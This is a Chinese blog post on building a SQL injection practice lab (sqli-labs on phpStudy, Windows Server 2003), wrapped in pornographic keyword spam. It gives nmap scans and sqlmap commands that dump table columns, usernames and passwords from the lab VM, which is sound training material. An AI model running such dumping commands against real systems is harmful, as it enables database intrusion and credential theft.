日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Win Server 2003搭建Sql注入环境

發(fā)布時間:2023/12/16 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Win Server 2003搭建Sql注入环境 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
  • 參考博客【SQL注入系列(一)——超詳細SQL注入環(huán)境搭建】,原博主寫得更為詳細,如有疑惑,可參考原文章

實驗環(huán)境說明

身份系統(tǒng)版本IP地址
服務(wù)器Windows Server 2003192.168.43.128
攻擊者Kali 5.3.0192.168.43.5

軟件及環(huán)境下載

  • 下載phpstudy,運行Apache和MySql

    • 【phpstudy官網(wǎng)】
    • 我下載的是適用Windows的2016的版本【下載地址】
  • 下載靶機環(huán)境

    • 【Github項目地址】
    • 【阿里云盤下載地址】(因為有分享限制,已經(jīng)將壓縮包解壓)

軟件安裝與環(huán)境部署

  • 安裝phpstudy軟件,注意安裝路徑,可能需要修改
    • 因為使用的是虛擬機環(huán)境,我是將軟件安裝在E:\phpStudy下的
    • 需要關(guān)閉防火墻(因為作為靶機使用,安裝完成系統(tǒng)后,就已經(jīng)將防火墻關(guān)閉了)
  • 安裝完成后,啟動phpStudy,同時啟動服務(wù)
    • 因為服務(wù)器還開啟了IIS服務(wù),所以80端口被占用,這里修改為了8080端口。如果啟動服務(wù)端口被占用,可以關(guān)閉相應(yīng)端口的服務(wù)或者更換phpStudy的服務(wù)端口

  • 訪問測試

    • 使用地址192.168.43.128:8080/phpinfo.php(如果沒有修改端口,則不需要使用端口號)
    • 出現(xiàn)如下情況即表示成功

  • 將靶場環(huán)境復(fù)制進服務(wù)器中

    • 將下載的靶場環(huán)境文件放入到phpStudy的環(huán)境中
    • 將整個sqli-labs-master 文件夾復(fù)制到E:\phpStudy\WWW中(如果是Github下載的壓縮包,需要解壓)
    • 找到E:\phpStudy\WWW\penetration\sql-connections文件夾下的db-creds.inc文件,將$dbpass =''后的引號內(nèi)添加數(shù)據(jù)庫的密碼($dbpass ='root')
      • Github項目的需要自己更改,阿里云盤下載的已經(jīng)修改了
      • 如果更改過MySql數(shù)據(jù)庫的密碼,可以通過以下方式查看密碼

  • 訪問靶場環(huán)境測試
    • 使用http://192.168.43.128:8080/sqli-labs-master訪問測試(這里我修改了靶場環(huán)境的文件夾名,所以是http://192.168.43.128:8080/penetration)
    • 點擊Setup/reset Database for labs檢查是否可以正常連接數(shù)據(jù)庫

  • 環(huán)境搭建完成!

Kali測試

nmap測試

  • nmap的端口狀態(tài)

    • open:端口是開放的

    • closed:端口是關(guān)閉的

    • filtered:端口被 Firewall/IDS/IPS 屏蔽,無法確定其狀態(tài)

    • unfiltered:端口沒有被屏蔽,但是否開放需要進一步確定

    • open|filtered:端口是開放的或被屏蔽

    • closed|filtered:端口是關(guān)閉的或被屏蔽

  • 常用選項

    • -p 掃描指定端口
    • -f 快速模式-掃描比默認掃描更少的端口
    • -v 顯示掃描過程
    • -A 全面系統(tǒng)檢測、啟用腳本檢測、掃描等
    • -V 顯示版本號
    • -h 幫助信息
    • -exclude-ports 從掃描中排除指定端口
    • -top-ports 掃描最常用的端口
    • -open 僅顯示開放的端口
    • -sS 使用TCP的SYN進行掃描
    • -sT 使用TCP進行掃描
    • -sU UDP掃描
  • 參考博客
    • 【Nmap使用方法_半磚的博客-CSDN博客_nmap使用教程】
    • 【nmap詳細使用教程_Rex Xie的博客-CSDN博客_nmap使用教程】
  • 使用命令nmap -p 22,23,80,3389 192.168.43.128,掃描22、23、80、3389端口是否開啟

    • 由掃描結(jié)果可以看到只開啟了80和3389端口

  • 使用命令nmap -O 192.168.43.128,掃描主機的操作系統(tǒng)
    • 根據(jù)掃描結(jié)果,可以看到主機開放的端口和主機的操作系統(tǒng)

sqlmap測試

  • 在使用sqlmap工具時,報錯[22:18:19] [WARNING] you haven't updated sqlmap for more than 920 days!!!
  • 使用命令sqlmap --update更新sqlmap工具
    • 要保證Kali可以聯(lián)網(wǎng)
  • 常用選項
    • -h 幫助文檔
    • -v 顯示詳細信息
    • -d 直接連接數(shù)據(jù)庫
    • -u 指定url掃描,url必須存在查詢參數(shù)。例 xxx.php?id=1
    • -l 后面跟一個log文件,判斷l(xiāng)og(日志)文件中所有記錄是否存在注入點
    • -?-version 查看sqlmap版本信息
    • -?-dbs 查看目標(biāo)服務(wù)器有什么數(shù)據(jù)庫
    • -?-tables 目標(biāo)主機中的數(shù)據(jù)庫有什么數(shù)據(jù)表
    • -?-columns 獲取目標(biāo)主機中數(shù)據(jù)庫的列數(shù)信息
    • -?-dump 查詢指定范圍的所有數(shù)據(jù)
    • -?-search 查詢目的主機是否存在相當(dāng)應(yīng)的列、表和數(shù)據(jù)庫
      • -D 指定數(shù)據(jù)庫
      • -T 指定數(shù)據(jù)表
      • -C 指定字段
  • 參考博客
    • 【sqlmap 使用教程_月生ψ的博客-CSDN博客_sqlmap使用教程】
  • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1"掃描,檢查是否存在注入漏洞

  • 可以看到靶機的PHP、Apache、MySQL的版本信息
  • URL后一定要有?id=1

  • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -dbs,獲取數(shù)據(jù)庫信息

  • 可以看到存在的數(shù)據(jù)庫

  • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test --tables,獲取數(shù)據(jù)庫中的表單信息

  • 可以看到test數(shù)據(jù)庫中的存在的表單

  • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test -T badboy --columns,獲取表單中的所有字段信息

  • 可以看到badboy表單中所有的字段信息

  • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test -T badboy -C username --dump,獲取表單中的指定字段的內(nèi)容信息

  • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" -D test -T badboy -C password --dump,獲取表單中的admin的密碼信息

  • 在進行測試的過程中,在服務(wù)器更改了數(shù)據(jù)庫內(nèi)容,添加了表單,但是在使用Sqlmap獲取數(shù)據(jù)庫表單時,沒有更新出新的表單。服務(wù)重啟、服務(wù)器重啟、Kali重啟都還是沒有更新出新的表單
  • 因為sqlmap在進行注入時,會有緩存記錄保存在 /root/.local/share/sqlmap/output中
  • 解決辦法
    • 使用命令rm -rf /root/.sqlmap/output/x.x.x.x刪除舊的緩存記錄,x.x.x.x表示注入的IP地址。刪除后重新啟動
    • 使用命令sqlmap -u "http://192.168.43.128:8080/penetration/Less-1/?id=1" --purge清理緩存

以上內(nèi)容均屬原創(chuàng),如有不詳或錯誤,敬請指出。 本文作者: 壞壞 本文鏈接: http://t.csdn.cn/KTtHS 版權(quán)聲明: 本博客所有文章除特別聲明外,均采用 CC BY-NC-SA 4.0 許可協(xié)議。轉(zhuǎn)載請聯(lián)系作者注明出處并附帶本文鏈接!

總結(jié)

以上是生活随笔為你收集整理的Win Server 2003搭建Sql注入环境的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 三级av网 | 日韩一区二区三区久久 | 日本成人在线播放 | 国产乱叫456在线 | 四虎成人精品在永久免费 | 一本加勒比波多野结衣 | 91丨九色丨黑人外教 | 欧美精品久久96人妻无码 | 丰满秘书被猛烈进入高清播放在 | 99热这里精品 | 我把护士日出水了视频90分钟 | 婚后打屁股高h1v1调教 | 久久一级片 | 国产日韩在线视频 | 99热在线这里只有精品 | 日韩av在线直播 | 亚洲激情三区 | 久久在线精品视频 | 打屁股无遮挡网站 | 婷婷久久亚洲 | 国产毛片自拍 | 俺去日| 人人爱人人射 | 日韩乱码人妻无码中文字幕 | 一卡二卡三卡在线视频 | 国产高清在线观看 | 亚洲网站在线观看 | 青青草国产精品 | 天堂а在线中文在线新版 | 成人听书哪个软件好 | 成人羞羞在线观看网站 | 99在线观看免费视频 | 91精品国产91久久久久青草 | 天天舔夜夜操 | 精品午夜福利在线观看 | 国产精品99久久久精品无码 | 夫妻露脸自拍[30p] | 好爽…又高潮了毛片免费看 | 日韩91| 丝袜av电影 | 热久久久久久 | 一级久久久久久 | 91春色 | 美女扒开尿口给男人看 | 黄色小说在线看 | 欧美老女人xx | 亚洲精品一区二区三区四区 | 久久精品导航 | 欧美日本在线观看 | 67194成人在线观看 | 天堂网国产 | 国产大片一区二区三区 | 精品日韩视频 | 黄色com | 日韩亚洲影院 | 午夜激情视频 | 人妻少妇精品无码专区二区 | 少妇中出视频 | 91国产高清 | 91精品人妻一区二区 | www.污网站 | 成人日韩精品 | 日本草草视频 | 久久天堂视频 | a级免费观看 | eeuss国产一区二区三区黑人 | 日本视频在线观看免费 | av资源站最新av | 亚洲大乳 | x88av在线| 亚洲婷婷久久综合 | caobi视频 | 污视频网站免费在线观看 | 91在线免费观看网站 | 国产69页 | 香蕉日日 | 香蕉视频入口 | 波多在线观看 | av在线一区二区三区 | 中文 日韩 欧美 | 日本精品在线一区 | 成人免费毛片aaaaaa片 | 午夜欧美日韩 | 热精品 | 自拍偷拍欧美视频 | 亚洲精品视频在线 | 中文人妻av久久人妻18 | 亚洲国产一区二区三区a毛片 | 亚洲女同在线 | 亚洲国产精品第一页 | 无码人妻精品一区二区蜜桃网站 | 99久久视频 | 东北少妇不戴套对白第一次 | 偷拍xxxx| 欧美在线观看不卡 | 国产一级片久久 | 成人免费在线小视频 | 午夜神马福利 | 亚洲精品~无码抽插 |